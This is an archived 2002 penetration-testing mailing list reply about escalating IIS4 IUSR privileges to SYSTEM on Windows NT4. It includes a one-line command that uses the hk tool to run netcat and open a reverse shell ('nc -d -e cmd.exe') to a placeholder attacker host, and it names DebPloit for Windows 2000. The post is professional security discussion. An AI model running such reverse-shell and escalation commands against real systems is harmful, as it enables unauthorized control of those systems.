Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Penetration Testing: Re: escalating IUSR to admin rights via unicode and iis4

Re: escalating IUSR to admin rights via unicode and iis4

From: Daniel Polombo <polombo_at_cartel-securite.fr>
Date: 30 Jul 2002 13:41:19 +0200

Le jeu 11/07/2002 à 19:18, Bill Pennington wrote :

> Then just run netcat via hk.exe, connect to the listener, and bingo you
> are SYSTEM.
>
> It has been a while since I have done this so I don't recall the exact
> syntax but that should get you pointed in the right direction.

hk <command>

For instance :

  hk nc -d -e cmd.exe attacker:port

will shovel a shell to attacker:port.

Note that hk only works on NT4 (up to sp6a, meaning that most NT boxes
you'll ever meet should be vulnerable). For win2k, have a look at
DebPloit instead. 

--
Daniel Polombo
Consultant
Cartel Sécurité
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Received on Jul 31 2002
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]